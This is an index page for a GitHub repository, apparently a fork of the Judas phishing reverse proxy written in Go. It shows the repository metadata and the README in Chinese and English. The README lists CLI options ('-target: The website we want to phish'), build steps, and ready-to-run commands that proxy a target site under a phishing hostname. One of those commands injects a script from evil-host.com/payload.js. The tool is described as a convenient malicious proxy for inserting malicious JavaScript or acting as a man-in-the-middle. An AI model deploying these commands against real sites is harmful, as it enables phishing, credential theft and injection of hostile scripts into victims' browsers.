Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/canc3s/judas
轻便的恶意反代
https://github.com/canc3s/judas
Last synced: 21 days ago
JSON representation
轻便的恶意反代
- Host: GitHub
- URL: https://github.com/canc3s/judas
- Owner: canc3s
- License: mit
- Created: 2021-05-29T10:30:43.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-05-29T11:13:40.000Z (over 3 years ago)
- Last Synced: 2024-08-05T17:31:29.899Z (4 months ago)
- Language: Go
- Size: 14.6 KB
- Stars: 44
- Watchers: 2
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE.txt
Awesome Lists containing this project
- awesome-hacking-lists - canc3s/judas - 轻便的恶意反代 (Go)
README
Judas
=====[英文(原版)wiki](https://github.com/JonCooperWorks/judas)
```
admin@admin judas % go run cmd/judas.go -h
Usage of judas:
-address string
Address and port to run proxy service on. Format address:port. (default "localhost:8080")
-inject-js string
URL to a JavaScript file you want injected.
-insecure
Listen without TLS.
-insecure-target
Not verify SSL certificate from target host.
-plugins string
Colon separated file path to plugin binaries.
-proxy string
Optional upstream proxy. Useful for torification or debugging. Supports HTTPS and SOCKS5 based on the URL. For example, http://localhost:8080 or socks5://localhost:9150.
-proxy-ca-cert string
Proxy CA cert for signed requests
-proxy-ca-key string
Proxy CA key for signed requests
-ssl-hostname string
Hostname for SSL certificate
-target string
The website we want to phish.
-with-profiler
Attach profiler to instance.
```## Building
Building `judas`
```
go build -trimpath -ldflags "-s -w" cmd/judas.go
```Building `plugin`
```
go build -buildmode=plugin -trimpath -ldflags "-s -w" examples/loggingplugin/loggingplugin.go
```
> `plugin` 功能无法在 `windows` 上使用## 用法
HTTP
```
./judas --target https://target-url.com --insecure --address=0.0.0.0:80
```HTTPS
```
./judas --target https://target-url.com --insecure --ssl-hostname phishingsite.com --address=0.0.0.0:443
```HTTPS+Certificates
```
./judas -proxy-ca-cert cert.pem -proxy-ca-key privkey.pem -target https://target-url.com -ssl-hostname baidu.com -address 0.0.0.0:443
```HTTP+proxy
```
./judas --target https://target-url.com --insecure --address=0.0.0.0:80 --proxy socks5://localhost:1080
```HTTP+evil
```
./judas --target https://target-url.com --insecure --address=0.0.0.0:80 --inject-js https://evil-host.com/payload.js
```## 其他
Judas在我看来不仅仅可以做一个便捷的恶意反代(一键插入恶意js代码或者中间人),还可以结合插件成为一个web蜜罐。
插件我在作者原有的 `searchloggingplugin` 以外,我增加了几个例子:`loggingplugin`(按日保存request) 、`responseprintplugin`(控制台输出response)、 `requestprintplugin`(控制台输出request)。
希望大家有想法可以一起共同交流